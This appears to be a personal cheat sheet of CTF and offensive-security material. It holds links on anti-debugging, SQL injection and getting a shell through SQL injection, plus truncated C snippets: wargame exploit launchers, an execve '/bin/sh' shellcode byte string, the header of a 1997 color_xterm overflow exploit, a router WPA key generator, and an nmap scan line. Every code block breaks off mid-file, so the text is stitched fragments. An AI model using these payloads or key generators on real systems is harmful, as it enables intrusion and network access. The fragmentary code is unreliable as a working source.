- http://jbremer.org/x86-api-hooking-demystified/
- http://www.codeproject.com/Articles/30815/An-Anti-Reverse-Engineering-Guide
- http://blog.praty.net/?p=235
- https://github.com/RC1140/hackfortress
- Very good tricks to avoid reversing, by the author of a challenge.
- Antidebug trick using constructor.
- http://radare.org/get/rootedlabs2013-radare.pdf
- http://www.ropshell.com/peda/
- http://pythonarsenal.erpscan.com/
- http://code.google.com/p/idapathfinder/
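```c
#include <stdio.h>
#include <unistd.h>  /* execl() */

int main() {
    /* Starts the target with an empty argument vector (no argv[0]). */
    execl("/vortex/vortex4", (char *)NULL);
    return 1;  /* reached only if execl() fails */
}
```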
```c
#include<stdio.h>
#include<string.h>
#if 0
char SC[] = "\xeb\x1d\x5b\x31\xc0\x67\x89\x43\x07\x67\x89\x5b\x08\x67\x89\x43\x0c"
"\x31\xc0\xb0\x0b\x67\x8d\x4b\x08\x67\x8d\x53\x0c\xcd\x80\xe8\xde\xff"
"\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x4e\x41\x41\x41\x41\x42\x42\x42"
"\x42";
#else
```
```c
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include "shellcode.h"
int main(int argc, char* argv[]) {
    if (argc < 2) {
        fprintf(stderr, "usage: %s <command> <arg1> ...\n", argv[0]);
        return 1;
    }
```
```c
/*
 * [qnix:/0x80]$ ls -la getroot password
 * -r-sr-x--- 1 root qnix 8966 2012-01-11 17:32 getroot
 * -r-------- 1 root root 11 2012-01-11 15:00 password
 */
#include<unistd.h>
#include<stdlib.h>
#include<stdio.h>
```
```c
/*
 * color_xterm buffer overflow exploit for Linux with non-executable stack
 * Copyright (c) 1997 by Solar Designer
 *
 * Compile:
 * gcc cx.c -o cx -L/usr/X11/lib \
 * `ldd /usr/X11/bin/color_xterm | sed -e s/^.lib/-l/ -e s/\\\.so.\\\+//`
 *
 * Run:
 * $ ./cx
```
```c
#include<stdio.h>
#include<stdlib.h>
void print_key(char p[], int f) {
    printf("key: ");
    int cycle;
    for (cycle = 0 ; cycle < 8 ; cycle++) {
        printf("%c", p[cycle]);
    }
```
```c
/*
 *
 * Implementation of the script originally at the following URL
 *
 * http://www.evilsocket.net
 * /1126/script-per-il-calcolo-della-chiave-wpa-nei-router-fastweb-pirelli.html
 *
 * http://wifiresearchers.wordpress.com/
 *
 *
```
- http://www.offensive-security.com/metasploit-unleashed/
$ nmap -v -sV 192.168.0.0/24
- Advanced SQLi exploitation with FILE_PRIV
- SQL injection by blackhat academy
- Creating Backdoors Using SQL Injection
- False SQL Injection and Advanced Blind SQL Injection
- https://www.pentesterlab.com/from_sqli_to_shell.html
- http://blog.y-shahinzadeh.ir/2012/07/bypassing-mysql_real_escape_string-and-magic_quotes_gpc/
- http://ceriksen.com/2013/01/27/vulnerability-chaining-magic-quotes-bypass-with-hexadecimal-literals-and-data-exfiltration/